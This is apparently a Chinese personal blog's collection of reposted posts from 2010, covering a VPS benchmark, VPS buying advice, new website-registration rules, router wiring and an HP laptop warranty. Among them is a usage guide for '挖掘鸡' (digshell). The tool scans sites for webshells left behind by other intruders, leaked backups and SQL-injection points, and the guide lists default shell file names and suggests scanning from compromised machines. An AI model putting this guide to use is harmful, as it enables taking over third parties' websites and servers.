而我的 VPS , 2G内存,8核CPU测试,但我不是使用上面的 yum 安装,而是全用源代码编译安装的,测试结果如下:

500并发,CPU使用率20%,负载2左右

# webbench -c 500 -t 30 http://127.0.0.1/index.php
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/index.php
500 clients, running 30 sec.

Speed=120520 pages/min, -36244332 bytes/sec.
Requests: 60260 susceed, 0 failed.

2000并发,CPU使用率20%左右,负载2左右,没啥变化

webbench -c 2000 -t 30 http://127.0.0.1/index.php
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.

Benchmarking: GET http://127.0.0.1/index.php
2000 clients, running 30 sec.

Speed=111454 pages/min, -44285944 bytes/sec.
Requests: 55727 susceed, 0 failed.

开到3000并发也一样,但打开页面要等几秒,突然一下出来,说明我进程开少了,还有余地。

现在我明白了前几天那个1500万PHP请求还能稳定访问是怎么回事了,哈哈,你只要CentOS 5.4 64bit,再按我上面的 yum 方法安装,也一样能顶住。

作者:21Andy 来源:Andy's Blog http://www.21andy.com/blog/

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
VPS入门攻略:选购VPS时应当注意的几个方面
什么是VPSVPS是Virtual Private Server的缩写,直译为虚拟专用服...
 

VPS入门攻略:选购VPS时应当注意的几个方面

| | 0 评论 |

什么是VPS

VPS是Virtual Private Server的缩写,直译为虚拟专用服务器。顾名思义,它不是一台真实的物理服务器,同时它又区别于Shared Hosting(虚拟主机),使用者对VPS拥有完全的控制权,即Root Access。

VPS的特点

1、相对独立的用户隔离:用户之间不再因为各种资源而打架,相互之间处于相对的隔离状态。

2、较高的安全性:得益于VPS相对独立的用户隔离的特性,其安全性相比Shared Hosting有了很大的提高。

3、拥有与Dedicated Server一样的用户体验:用户可以在VPS上安装自己喜欢的操作系统,如Linux的各种发行版,以及Windows的服务器操作系统,并且在使用的时,在操作和体验上,与控制一台Dedicated Server无异。

4、配置的灵活性与Dedicated Server无异:使用Shared Hosting的时候,一些组件或者服务,是不能自己选择或者自己安装的。一切都以服务商的环境为主。而是用VPS则可以选择自己喜欢的操作系统,安装自己喜欢的软件。这都是Shared Hosting无法做到的。

VPS的选购

本文所述,是本人选购VPS的一些经验,正因如此,本文所述只是一家之言。接下来我们从以下几个方面,看看选购VPS时应当注意的细节。

机房的选择

机房的选择是极其重要的,机房的位置、带宽等是影响VPS性能的重要因素。在选购VPS时,我们首先要考虑,是选择国内机房还是选择国外机房。我们先从国内机房开始。

国内VPS

从众多前辈选购VPS所总结出来的经验来看,如果想在国内干一番事业,同时具备各种备案条件以及综合的网站运营能力的话,国内的VPS应当是不二之选。因为相对于国外的VPS,国内VPS在速度上具有无可比拟的优势。从PING值上我们不难看出,很多使用国内VPS的站长或企业,他们服务器的 PING值都在60MS左右,上100的都很少见。当然,选择国内VPS必须考虑到我国特殊的国情——南北通。更确切的说,应当是国内服务商之间的互通问题。还记得,曾几何时,世界上最远的距离,是电信和网通之间的距离。因此我们在选择国内VPS的时候,对机房的选择,会更多的倾向于使用BGP(边际网关协议)的机房。使用BGP,可以很好的解决南北通的问题,使得访问者无论是在南方还是北方,无论使用的是电信还是网通,在速度上都能获得极好体验。

如果您希望在国内购买VPS,推荐您使用 RasHost 。其余其他服务商,我不能说他们不优秀,只是本人没有试用过,因此不敢妄加推荐。

国外VPS

有时候我们不得不选择国外的VPS,比方说一些外贸企业,他们的访问者不仅限于国内,更多的来自国外,如果VPS放在国内,将会给国外的访问者带来极其糟糕的体验。同时,为了保证国内与国外访问者在速度上都有良好的体验,在选择国外VPS时,机房的位置则十分重要,跃升为我们的最首要而且最基础的考虑因素。目前,在速度上,对中国十分友好国外机房有:San Jose(圣何塞) 》 Fremont(费里蒙特) 》 Los Angles(洛杉矶) 》 Las Vegas(拉斯维加斯) 》 Dallas(达拉斯) 》 Pennsylvania(宾夕法尼亚)。

1、San Jose (圣何塞) – 暂时没有找到价格靠谱的服务商。如果有知道的欢迎联系我。

2、Fremont (费里蒙特) – 以 Linode 为代表,其次是 Nerios 。这两家是我找到的,价格比较靠谱且服务比较稳定的服务商。

3、Los Angles (洛杉矶) – 主要服务商包括 VPSYou、EcVPS、RasHost、DiaHosting 等,他们的价格要比 Linode 和 Nerios 的要友好,同时客服支持中文也支持支付宝。比较方便。

4、Las Vegas (拉斯维加斯) – 主要服务商包括 VPSYou、EcVPS、RasHost、DiaHosting 等。

5、Dallas (达拉斯) – 主要服务商包括 VPSYou、EcVPS、RasHost、DiaHosting 等。

6、Pennsylvania (宾夕法尼亚) – 以 Burst 为代表,速度上是最慢的,PING值有时候会高达400+MS。

以上提到的服务商也许并不是最出色最优秀的,但全部都是我使用过或者测试过的,我在推荐它们的之前,也 Google 过,他们的口碑还算可以。如果以后我在使用或者测试的过程当中还发现有不错的服务商,我也会陆续补充进来。

虚拟化技术的选择

市面上有基于多种虚拟化技术的VPS,其中比较主流的是基于 OpenVZ 以及 Xen 虚拟化技术的VPS。我个人认为,在使用上,这两者之间的区别在于,前者容易超卖,并且大多数服务商都在超卖,后者不容易超卖,几乎没有服务商能够超卖。同时,前者由于不支持 eth0 的虚拟化,因此不支持基于 PPTP 的VPN,而后者支持。

对于基于 OpenVZ 虚拟化技术的VPS,价格较便宜,但稳定的不多,目前发现稳定性比较靠谱的是 EcVPS 。

对于基于 Xen 虚拟化技术的VPS,价格相对较贵,但因其不容易超卖,所以稳定性较高。目前口碑最好的是 Linode ,当然根据我自己的测试,比较靠谱的还有 VPSYou 和 RasHost 。

个人认为,如果纯粹放网站,不考虑提供基于PPTP的 VPN 服务的话,基于 OpenVZ 虚拟化技术的VPS,在价格上会更加亲民,当然要考虑超卖的因素。如果要提供基于 PPTP 的 VPN 服务的话,基于 Xen 虚拟化技术的 VPS 则是不二之选。

价格的考虑

价格方面,说实在的,其实没什么好谈,看菜吃饭,是最靠谱的。不过,在这里我们要注意,尽量选择支持月付的VPS(貌似大多数都支持)。月付20USD左右,内存如果能在256M以上,算是比较靠谱的了,否则还不如买 Dedicated Server 呢。

支付方式的考虑

对于国内用户来说,支持支付宝那当然是最好了,如果不支持支付宝,那支持 PayPal 或者 Google Checkout 也比较靠谱。支付方式的考虑,主要是从安全性的角度进行的。目前主流的 PayPal 以及 Google Checkout ,当然还有支付宝,都是比较安全的在线支付方式,在支付的时候尽量使用这些支付途径,而不要直接填写信用卡信息——信用卡是不可以"到处留情"的。使用 PayPal 、 Google Checkout 以及支付宝,虽然也要暴露自己的信用卡或者借记卡信息,但毕竟这些是大企业,保障用户个人信息安全是他们的立足之本。

其他因素

实际上,选购VPS时所要考虑的因素还有以下几个:

控制面板:我们要对VPS进行配置管理,友好的控制面板十分重要,比方说SolusVM、HyperVM、 VePortal以及Xen-Shell等。有些服务商并没有提供控制面板,导致重装系统需要提交服务单,这都比较不靠谱,如 RasHost 。有些服务商提供了自主开发的全功能的控制面板,使得管理十分方便,如 Linode 。有些服务商则提供了非自主开发,但功能也比较全面的控制面板,如:VPSYou、EcVPS、DiaHosting 。

技术支持:VPS在售后服务上分为 Managed VPS 和 UnManaged VPS,顾名思义,前者提供全方位的售后服务,而后者则提供基本的售后服务如宿主机器或者网络故障的检测与排除。同时,前者由于具有全方位的售后服务保障,所以价格要比后者贵出许多。而后者,则全靠站长自力更生。具体的说,就是购买了 Managed VPS 的话,你可以要求客服帮你装一些程序,例如 Wordpress 、 Joomla 以及 Discuz 等,适合新手。而 UnManaged VPS 则不提供帮装程序的服务,因此比较适合懂技术或者有点技术功底的人。

使用限制:对VPS的使用不是无限制的,它受到了服务商的TOS(用户协议)以及当地法律的约束,在购买VPS 时,必须考虑到具体的使用用途,并且对用途进行预判,看看是否会违反使用限制。在使用过程中,如果违法用户协议或者当地法律,VPS可能会被直接关闭,甚至数据都无法取回,这样损失就大了。当然凡是皆有例外,比方说国内的服务商以及在荷兰注册的一些互联网企业,他们的使用限制就较少,用起来会比较自由。

退款策略:善用服务商的退款策略,可以有效保障自己的权益,关于退款策略,每个服务商都会有一些差别,这些都是我们需要了解的。关于退款的规定和流程,一般也会在TOS中有叙述。

From: http://www.chinaz.com/Webbiz/Exp/022510G342010_2.html

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..

我的QQ空间
工信部管理新规释放利好 个人可办网站获明确 个人草根站长的福音
工信部向各地通信管理局等单位印发通知,进一步落实网站备案信息...
 

工信部管理新规释放利好 个人可办网站获明确 个人草根站长的福音

| | 0 评论 |

工信部向各地通信管理局等单位印发通知,进一步落实网站备案信息真实性核验工作。通知中明确规定,单位和个人都可以作为网站主办者。

工信部新规"个人可开办网站"挽回网民信心

据悉,这是工信部首次在官方文件中正式明确个人拥有依法开办网站的权利。早先工信部官方网站的《关于备案政策等问题的答疑》虽然明确指出"个人开办的网站可以申请网站备案",但这只是对个人开办网站的合法性予以间接肯定。工信部直接肯定个人可以依法开办网站的管理新规出台,对广大个人网站开办者或拟开办网站的个人来说,无疑是一个令人振奋的利好消息。

针对工信部网站管理的新规,网络调查显示,56.2%参与调查的网民表示"会开办个人网站"。由此可见,工信部新规已经得到较广泛支持和拥护。不过市场信心的大幅回升尚待时日。

分析认为,作为网站的创办者,该政策明确了个人与单位的同等地位。在政府监督部门的政策尺度上,个人网站的注册开始由最初的严格监控开始已经变为现在的鼓励支持。

或成工信部统筹考虑个人注册域名起点

域名注册是网站开办和运行的必备条件。如今工信部网站管理新规明确"个人可以开办网站的权利",有评论人士解读为个人域名注册的政策阻碍已经得到基本清除,这可能是工信部通盘考虑"正式开放个人域名注册"的政策制定和出台的起点。

也有些人对新规中当场核验等实际操作上的繁琐提出不满和抱怨。相比该通知透露出来的政策的正面风向而言,应该都不是太大的问题。

可以预期,针对个人网站,这只是政府出台相关政策的一个转折点,今后针对个人创办网站的政策将更加精细化、开放化,还将会有为针对个人站长利好政策和细则出台。

From : http://www.chinaz.com/News/IT/022510G392010.html
谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..
我的QQ空间
常见的5口路由器接线原理图
现在如今宽带上网的方式有很多种..下面我就列一下最常见的几种上...
 

工信部:站长需至IDC处当面拍照核验备案资料 这个玩笑开大了.

| | 0 评论 |

GXB:站长需至IDC处当面拍照核验备案资料 这个玩笑开大了.
比如: 我在深圳工作,,昨天在北京一家IDC 买了空间备案还要专门跑到北京去拍照?? 这个一南一北的来回跑就为了拍一个照...  为不是成了天大的笑话???  无语ing....

为切实保证网站备案信息的真实性,落实《工业和信息化部关于进一步深入整治手机淫秽色情专项行动工作方案》中的要求:"基础电信企业和各接入服务商在向通信管理局提交网站申请备案之前,要对主办者身份信息当面核验、留存有效证件复印件,要对网站主体信息、联系方式和接入信息等进行审查"。依据《互联网信息服务管理办法》(国务院令第292号)、《非经营性互联网信息服务备案管理办法》(信息产业部令第33号)的相关规定,制定网站备案信息真实性核验工作方案。

福建省通信管理局原文:http://www.fjca.gov.cn/make-html/3267.html

广东省通信管理局原文:http://www.gdca.gov.cn/site/20.asp

一、核验内容

接入服务单位根据相关网站的委托代为履行备案、备案变更等手续时,应对网站主办者提交的主体信息、联系方式、网站信息,以及本单位提交的接入信息的真实性进行核验。

1.网站主办者(主体)信息

网站主办者是指互联网信息服务提供者,包括单位和个人两类。

(1)网站主办者为单位,核验证件为:

如网站主办者为机关、事业单位、社会团体,组织机构代码证书原件为核验其单位资质的第一证件,在没有组织机构代码证书的情况下,可核验事业法人证书或社团法人证书等原件。

如网站主办者为企业,核验工商营业执照或组织机构代码证书等原件。

如网站主办者为军队,核验军队代号证书原件。

网站负责人的个人证件:如网站负责人为中国公民,身份证原件为核验其身份的第一证件,在没有身份证的情况下,可核验户口簿、军官证、台胞证等原件;如网站负责人非中国公民,则核验其护照原件。

(2)网站主办者为个人,核验证件为:

如网站主办者为中国公民,身份证原件为核验其身份的第一证件,在没有身份证的情况下,可核验户口簿、军官证、台胞证等原件。

如网站主办者非中国公民,则核验其护照原件。

(3)网站负责人的定义:若网站主办者为单位,网站负责人是指法定代表人或单位委派具体负责网站的部门负责人;若网站主办者为个人,网站负责人为其本人。

2.联系方式

如网站主办者为单位,联系方式是指网站负责人手机号码、办公电话、电子邮箱、通信地址;如网站主办者为个人,联系方式是指网站负责人手机号码、办公电话或住宅电话、电子邮箱、通信地址。

3.网站信息

网站名称、网站域名、涉及需前置审批或专项审批内容、网站服务内容/项目。

4.接入信息

接入服务提供者名称、接入方式、服务器放置地点、网站IP地址。

二、核验、审核、核查规程

(一)备案信息真实性责任主体

接入服务单位根据相关网站的委托代为履行备案、备案变更等手续时,核验主体为接入服务单位,包括:基础电信企业省分公司(含市、县级分公司)、互联网接入服务单位(IDC、ISP)、公益性互联单位等。

审核主体为各省、自治区、直辖市通信管理局。

核查主体为工业和信息化部(委托国家互联网备案管理支撑中心,以下简称"备案中心")。

(二)备案信息真实性核验、审核、核查规程

网站备案信息真实性核验、审核工作流程图见附件。

1.接入服务单位网站备案核验规程

(1)网站主办者登录接入服务单位备案系统录入网站备案信息。

(2)接入服务单位受理网站主办者提交信息后,对主体信息、联系方式等信息进行预核验:初步判定主体信息是否真实,通过电话、邮件等途径核验联系方式是否正确。预核验后,接入服务单位应向网站主办者发送现场核验通知或信息退回的短信提示:"您提交的网站备案信息已通过预核验,请在1个月内由网站负责人本人携带有关证件原件到我单位备案现场办理核验手续"或"您提交的网站备案信息未通过预核验,请修改后重新提交"。预核验工作必须在主办者提交备案信息后5个工作日内完成。

(3)网站主办者接到通知后,由网站负责人本人携带核验所需证件原件、材料到接入服务单位备案现场办理核验手续。

(4)接入服务单位在本单位备案现场采集并留存网站负责人彩色正面免冠照(电子照片规格:800×600像素)。备案中心统一制作、提供带有标识的幕布作为拍照背景,照片应显示拍照时间和背景标识。

(5)接入服务单位备案人员利用公安、质检、工商等相关部门提供的居民身份证、组织机构代码证、工商营业执照等信息源,核验网站主办者提供证件原件的真实性。同时通过网站负责人身份证原件核验身份证与当事人是否一致。核验无误,留存身份证明和单位有效证件复印件。

接入服务单位备案人员登录本单位备案系统,依据证件原件内容对网站主办者网上提交的主体信息进行核验:核验证件持有者、证件类型、证件内容与备案系统中录入的网站备案信息是否完全一致,不一致不予受理;依据网站主办者提交的域名证书或域名注册机构网站公共查询信息,核验网站域名所有者与网站主办者身份的一致性,不一致不予受理;依据本单位对网站的实际接入情况,准确录入网站备案接入信息各项内容。

(6)若核验无误,接入服务单位备案人员填写统一格式的《网站备案信息真实性核验单》(备案中心负责制订《网站备案信息真实性核验单》格式);若发现备案信息有误,现场核实修改,并在《网站备案信息真实性核验单》中进行记录。《网站备案信息真实性核验单》一式两份:一份接入服务单位留存,一份上报网站主体所在地通信管理局,加盖接入服务单位公章。网站主办者和接入服务单位同时签订信息安全管理协议书。

(7)在确认备案信息全部核验无误后,接入服务单位通过本单位备案系统向主体所在地通信管理局备案系统提交网站备案信息,并提交《网站备案信息真实性核验单》纸制原件、传真件或电子扫描件。

2.省通信管理局审核规程

各省、自治区、直辖市通信管理局登录省局备案系统,在二十个工作日内对接入服务单位提交备案信息进行审核。审核合格下发网站备案号,接入服务单位实施网站接入;不合格将备案信息退回接入服务单位系统,由接入服务单位重新核验。

3.备案中心核查规程

(1)备案中心受工业和信息化部委托,建设网站备案信息校验平台,对各通信管理局提交网站备案信息中的身份证信息进行全量自动核查。结合人工电话抽查,每月对备案系统提交的网站备案信息进行准确性核查和抽样评估并反馈情况。

(2)备案中心每季度对部备案系统中存量网站备案信息准确率、备案率分省分接入商进行核查和抽样评估并反馈情况。

三、工作要求

(一)接入服务单位核验工作要求

1.组织保障和制度完善要求

各接入服务单位应在2010年2月底前设立现场核验网站备案信息部门,专门负责网站备案信息真实性核验工作,并实行单位领导负责制。应建立本单位的备案业务规范,备案工作考核制度。明确备案人员的工作责任,对备案人员业务能力实行年度考核,将日常备案工作质量作为考核的重要指标。

各接入服务单位应在2010年3月底前正式实施网站备案信息当面核验,并将工作开展情况报许可证发证机关和单位注册所在地通信管理局。

基础电信企业应在2010年4月份对租用本单位电信资源从事接入业务的接入服务单位是否设立当面核验人员、履行当面核验备案信息的情况进行检查,对未履行当面核验责任的,不得为其提供电信资源。

2.业务明示要求

接入服务单位在业务经营中应向网站主办者明示开办网站要依法办理备案手续、网站备案流程、需提供的证件、材料清单及网站备案有关注意事项。

3.业务合同内容要求

接入服务单位应在与网站主办者签订业务合同中,明文要求:"依据《非经营性互联网备案管理办法》第二十三条规定,如备案信息不真实,将关闭网站并注销备案。请您承诺并确认:您提交的所有备案信息真实有效,当您的备案信息发生变化时请及时到备案系统中提交更新信息,如因未及时更新而导致备案信息不准确,我公司有权依法对接入网站进行关闭处理。"双方签字、单位盖章确认。

From:http://www.chinaz.com/Webmaster/report/022210D362010.html
 
谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..
我的QQ空间
常见的5口路由器接线原理图
现在如今宽带上网的方式有很多种..下面我就列一下最常见的几种上...
 

常见的5口路由器接线原理图

2010年2月22日星期一 | | 0 评论 |

现在如今宽带上网的方式有很多种..下面我就列一下最常见的几种上网方式,有线上网方式的路由接线方式的图示.不熟悉网络的您可以按照以下的方式进行线路连接.. 再对路由进行相应的配置就可以实现上网而不需要"宽带连接"直接就可以上网了.. 哈,,祝你好运, 虎年顺利!

一、ADSL Modem电话线上网 5口路由器接线原理图

二、Cahle Modem有线电视上网 5口路由器接线原理图

三、宽带上网 5口路由器接线原理图

谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..
我的QQ空间
挖掘鸡下载、使用说明、视频教程及bug收集帖
使用说明(最新更新@2009年6月25日):挖掘鸡是否正常工作?勾选...
 

挖掘鸡下载、使用说明、视频教程及bug收集帖

2010年2月21日星期日 | | 0 评论 |

使用说明(最新更新@2009年6月25日):


挖掘鸡是否正常工作
勾选后缀中的挖掘测试组,直接点开始(≥),很快能开始扫描并看到挖到结果,则说明挖掘鸡正常工作中。

挖掘鸡是干什么的
一些黑客及黑客软件(包括网站管理员及管理员工具)往往会在网站生成习惯性的特定路径。
比如管理员往往直接把把整站压缩备份在网站跟目录的wwwroot.rar,很容易被别人下载去了。
比如常见木马上传文件名:明小子旁注在网站/或/bbs/下默认上传diy.asp,内容为简单的上传shell,密码为空;
再如常见qq密码信文件名:阿拉QQ大盗在网站/下默认上传tmdqq.asp,用于接收密码信并存到同路径的qq.txt中。

但这样的路径在网络中孤立无链接,通过搜索引擎很难收集,而挖掘鸡正是针对此类路径进行扫描来获取敏感信息或webshell等权限。


初级用法

勾选想要扫的后缀(不同组的后缀不要一起扫,这样效率很低),点开始(≥)即可(关键词留空的话程序会自动选择热门关键词)。
另外,对勾选的后缀要有所认识,比如普及程度、流行时间等相关背景。可百度一下后缀的信息进行了解。
也可以根据最新漏洞信息或流行的软件自己添加后缀进行扫描,这样往往能得到大量的扫描结果。

F&Q:

挖掘鸡一直在初始化并且内置的浏览器也打不开任何网页?
如果网络没有问题则是ntfs权限问题。请新建文件夹,并将挖掘鸡放入此文件夹内运行(为了防止IE木马挖掘鸡默认以来宾身份运行)。

挖掘鸡挖掘了好几个小时,扫描了几万个连接,一个结果也没有?
这是正常现象,有的后缀较罕见,有的要长时间无人值守运行才能有结果。如果挖掘测试链接没有问题,说明挖掘鸡正常工作中。
如果对自己的后缀有信心,请大胆的往下扫,有耕耘定会有收获。



中级用法:

后缀:

网络上的链接都分解成http://域名+路径+文件名+参数,比如http://xxx.com/abc/123.asp?id=4中域名是xxx.com, 路径是/abc/, 文件名是123.asp, 参数是?id=4。
挖掘鸡的后缀中包含后缀路径,后缀文件名和特征字串。它们用来和网络链接的域名,路径,文件名,参数相组合进行各种灵活的扫描。
(小知识:后缀路径不是一个而是一组时,比如/,/bbs/,/forum/,则依次枚举扫描这些路径后缀文件名的组合)

先说下特征字串的含义:
特征字串不为空时,目的页面中包含特征字串则返回结果;
特征字串为空时, 目的页面存在就返回结果。

而扫描的目的页面是怎么生成的呢?
最常见的目的页面是:http://域名+后缀路径+后缀文件名,比如挖掘测试组的两个后缀。
较特殊的目的页面有:
1.后缀文件名为空时,扫http://域名+后缀路径,比如后缀路径为/admin/,用来扫管理入口。
2.后缀路径为空时, 扫原始URL+文件名后缀,比如文件名后缀为',用来扫sql注入;再比如POST方式提交。
3.以上2者都为空时, 扫http://域名+路径 ,比如特征字串为/</title>,用来扫开启目录浏览的iis目录。
4.要扫描原始完整URL呢,则后缀文件名为*,后缀路径为空,比如特征字串为^<%.*?%>/g,用来扫asp/jsp源码泄漏。

注意:考虑到对关键词的要求不同,基于文件名的后缀(后缀路径为空,比如SQLinj后缀)不要与基于路径的后缀一起扫。

关键词:
1、如果想不到独特的关键词则不如留空,让挖掘鸡随机产生关键词。比如qq、免费空间等常见词大家都在扫,反而会限制挖掘范围,挖掘结果也会类似。尤其用肉鸡长时间大范围扫描的话,毕竟针对某关键词的页面是有限的,很快就会重复,建议留空。
2、扫SQLinj等基于文件名的后缀时(一般后缀是基于路径的),关键词最好用前缀来限定一下,比如inurl:asp 关键词 (兼容baidu,google语法),保证目标网址是http://xxx.com/xxx.asp?id=x 的形式,提高挖掘效率。


线程数:
一般ADSL用户推荐20-50线程,挖掘时状态栏有扫每个链接的平均耗时,可以根据它来决定是否增加线程。(论坛有投票帖,大家可以针对自己的联网方式比较一下)。

词频:
关键词不为空时,词频建议取最小值(10),这样结果页面相关度比较高;
关键词为空时,建议不要取缺省值(20),并且在保证自己取值独特性的基础上尽量取小,比如13。

扫描模式:
速度模式会产生更多结果,但准确性会降低,需要手工验证,或程序自动验证(挖掘结果>右键>重新验证)。
精度模式要处理重定向等信息,速度稍慢,结果准确性大大提高,建议用此模式。



高级用法:

1、不要用来扫QQ,扫QQ只是挖掘鸡最简单的一个应用。

2、自己添加后缀的技巧:
挖掘鸡的后缀有限,虽然能时常在线更新后缀,但是毕竟所有人都在扫(很多人扫到以后还会改名以独享扫描结果),效率不是很高。自行添加后缀才能真正的让挖掘鸡为你服务。比如刚想到servu.asp时随便一个扫描结果就是一个3389肉鸡。
添加哪些后缀要看自己的想象力和对热门黑客及管理员的熟悉程度,主要靠自己相关知识的累积(从这个意义上来说,挖掘鸡绝不仅仅是菜鸟工具),唯一能说说的是特征字串的选择。

3、特征字串的选择技巧:
为了加快扫描速度,挖掘鸡默认只在目的页面的前20K(包含html头信息)中搜索特征字串(不区分大小写),特征字串的选取要有独特性,这样可以保证扫描结果的准确性。对于不太了解特征字串的后缀(比如rar文件等),可留空。
同一个后缀要指定多种特征字串时,用_|_分割,表示或的关系。特征字串以/g等结束,代表使用正则表达式匹配。

建议大家对相关的热门软件多试用多思考,发掘出属于自己的后缀(能共享更好)。(有不少人看qq.txt好扫就想当然添加qq.asp等(而且特征字串也不改),这样没有软件依据的添加后缀,不会挖到很多结果的。)

4、后缀文件名:后缀文件名中不能包含空格,添加SQL注入后缀是请用%20代替空格。

5、更新中。。。

QQ群:(交流更多挖掘鸡使用经验)
普通群:5637555, 4866524 (满,随时踢随时加,看你运气了)。
VIP群: 17477103, 17477104, 17477105 +入需充1QB(用于扩充群的人数)
元老群:3835111(偶尔有名额,除了运气还要看人品,论坛帖数>200)
隐藏群:XXXXXXX(难得有名额,除了人品还要看长相。论坛帖数>500)

最新版挖掘鸡下载:http://ma.vvind.com/uploads/digshell.exe

视频教程:(在新开窗口中观看)



 
From: http://ma.vvind.com/vvind_thread857-1.html
 
谢谢光临本站: http://home.benz.la   共享无限..  转载请注明出处..
 
我的QQ空间
我的HP540 中了闪屏门 我成了"闪屏门"受害者之一
郁闷的告诉大家一个事情.. 我的HP540 中了闪屏门,,我成了"...
 

我的HP540 中了闪屏门 我成了"闪屏门"受害者之一

2010年2月20日星期六 | | 2 评论 |

郁闷的告诉大家一个事情.. 我的HP540 中了闪屏门,,我成了"闪屏门"受害者之一
呼...
顺便用手机拍了两个视频,, 到时把机子拿去维修点看能不能换...唉...
 
视频一:


 视频二:


希望到时拿到 福州市六一北路那个HP惠普金牌维修点  时,,可以免费帮我换一个屏...

 

我的QQ空间
商用笔记本计算机针对个人用户的保修升级的说明
商用笔记本计算机针对个人用户的保修升级的说明  一、定义:根...
 

商用笔记本计算机针对个人用户的保修升级的说明

2010年2月12日星期五 | | 0 评论 |

商用笔记本计算机针对个人用户的保修升级的说明

  

一、定义:

根据国家《微型计算机商品修理、更换、退货责任规定》个人消费用户享有主要部件享两年保修,因此惠普公司为个人消费用户所购买的标准服务为一年的商用笔记本电脑产品提供为期两年的送修服务升级



二、范围和条件:

1)根据有关规定,该保修升级服务只针对个人消费用户有效。请您在购机时务必索取经销商开具的国家税务局标准发票,并建议经销商在购机发票的购货单位(客户名称)栏准确填写机主个人姓名。惠普公司将据此为您办理保修升级服务。

2)为保证您能安享主要部件为两年的送修服务,请您务必在购机后将购机发票,《产品保修卡》及《产品三包凭证》, 妥善留存。《产品保修卡》及《产品三包凭证》上需要填写的内容按照用户实际情况填写,上面需清楚准确填写用户信息,包括用户姓名,详细通讯地址,邮编及联系电话。当您在机器出现故障联系维修中心提供服务时,请您也同时出具此三项资料以便我们的维修中心及时为您提供服务。


升级方法一:(推荐)

将经销商开具的个人名头国家税务局标准发票、《产品保修卡》及《产品三包凭证》扫描为图片,压缩后以电子邮件形式发送至[email protected] 即可

 

请注意:
 

图片请保持为.jpg格式图片

并使用压缩软件压缩为.zip或者.rar格式,做为电子邮件附件发送。附件需小于5M

请保证图片上文字信息清晰可见。


升级方法二:

将经销商开具的个人名头国家税务局标准发票、《产品保修卡》及《产品三包凭证》的复印件邮寄至:

北京市石景山区石景山路 22 号万商大厦5 保修升级部门

邮编: 100043


请注意
:
 

请保证复印图片上文字信息清晰可见。



升级周期
:
 

1),由于商用机一年保修升级为两年保修操作比较复杂,

自用户提供完整资料后

标准周期为45个工作日(一个半月)

安全周期:60个工作日(二个月)

如自申请二个月后还没成功,可能是资料不全或不符合升级服务的要求,请重新核实申请,或联系8008100039查询.




自助保修查询方法

请参考以下链接文章: 

http://h50176.www5.hp.com/support/004165-001/faqs/122386.html



惠普技术支持热线:800-810-3888 固定电话 / 400-610-3888 移动电话免长途费用需付市话费.

 

©Copyright 2009 Hewlett-Packard Development Company, L.P.

Hewlett-Packard 公司对本文档包含的技术性或编辑性错误或遗漏之处不承担任何责任。 本信息以"维持原状"的方式提供,没有任何种类的担保。 在法律允许的范围内,在任何情况下,HP 或其附属公司、分包商或供应商都不对偶然、特殊或随发损坏负责,包括停机成本;利润损失;与获取替代产品或服务相关的损坏; 或数据丢失或软件恢复损坏。 本文档包含的信息可能随时更改,恕不另行通知。 本文中所涉及的 Hewlett-Packard 公司和 Hewlett-Packard 产品名称是 Hewlett-Packard 公司在美国和其它国家/地区的商标。 本文中所涉及的其他产品和公司名称可能是其相应所有者的商标。

 
我的QQ空间
惠普笔记本 商用产品保修查询方法 在线查询
呼,, 挺郁闷的.. 我的惠普机子中了惠普的"闪屏门"... ...
 

我的惠普产品查询结果,,顺手一贴

| | 0 评论 |

我的惠普产品查询结果,,顺手一贴
 
Disclaimers:
Expiration dates are based on the date of purchase. The dates below are an estimate of the actual warranty term.
You may have purchased an HP Care Pack that is not reflected below. If you have an HP Care Pack ID you can view the details using the HP Care Pack Registration Lookup tool.
You may have purchased a contract for additional services. At this time, this tool does not return data for contracts.
perform a new warranty check

result 1 of 1

Serial Number CNU83325V9
Product Number FS302AA
Product Description H540UT5470W4X16CINNNN10La ALL
Date of Warranty Check 13 Feb 2010

Warranty Type Base Warranty
Wty: HP HW Maintenance Offsite Support
Status Expired
Start Date 03 Sep 2008
End Date 01 Nov 2009
Service Level Std Office Hrs Std Office Days , Standard Parts Logistics , Standard Material Handling , Global Coverage , Std Office Hrs Std Office Days , Customer delivers to RepairCtr , No Usage Limitation , 2 Business Days Turn-Around , Customer Pickup at RepairCtr
Deliverables Offsite Support & Materials
Hardware Problem Diagnosis
Wty: HP Support for Initial Setup
Status Expired
Start Date 03 Sep 2008
End Date 30 Jan 2009
Service Level NextAvail TechResource Remote , Std Office Hrs Std Office Days , Unlimited Named Callers , 2 Hr Remote Response
Deliverables Initial Setup Assistance
perform a new warranty check
 
我的QQ空间
惠普笔记本 商用产品保修查询方法 在线查询
呼,, 挺郁闷的.. 我的惠普机子中了惠普的"闪屏门"... ...
 


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]